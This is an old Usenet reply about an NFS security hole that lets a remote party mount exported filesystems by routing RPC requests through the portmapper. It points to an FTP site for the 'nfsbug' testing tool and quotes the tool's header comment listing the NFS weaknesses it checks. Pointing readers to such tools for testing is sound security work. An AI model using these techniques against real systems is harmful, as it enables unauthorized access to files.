> I just read a post in comp.security.unix entitiled "widespread security hole > in exporting of filesystems" which claims there are ways to break into a > system that has filesystems exported to itself. > > Does anyone know anything about this? The post said "the trick is to make > RPC requests via the portmapper, in such a way that they appear to the mount > daemon to be coming from within the host itself." > > The post mentions a program that is "out there" to exploit this hole. If > anyone has any knowledge of this, could you please post instructions on how > to test for this. Yes, this knowledge is widespread. Pick up the following program which shows how to exploit this and other well known NFS problems. I have enclosed the starting comment from the program at the end of this message. Host ftp.cs.vu.nl Location: /leendert FILE -rw-r--r-- 7597 May 16 15:15 nfsbug.aix.patch FILE -r--r--r-- 3478 May 4 12:12 nfsbug.hpux.patch FILE -r--r--r-- 36023 May 3 19:51 nfsbug.shar Steinar Haug, SINTEF RUNIT, University of Trondheim, NORWAY Email: Steinar.Haug@runit.sintef.no ----------------------------------- /* * nfsbug.c * * Test hosts for well known NFS problems/bugs. Among these tests are: * find world wide exportable file systems, determine whether the * export list really works, determine whether we can mount file systems * through the portmapper, try to guess file handles, excercise the * mknod bug, and the uid masking bug. * * Author: * Leendert van Doorn, april 1994 * * TODO: * - close sockets (?) */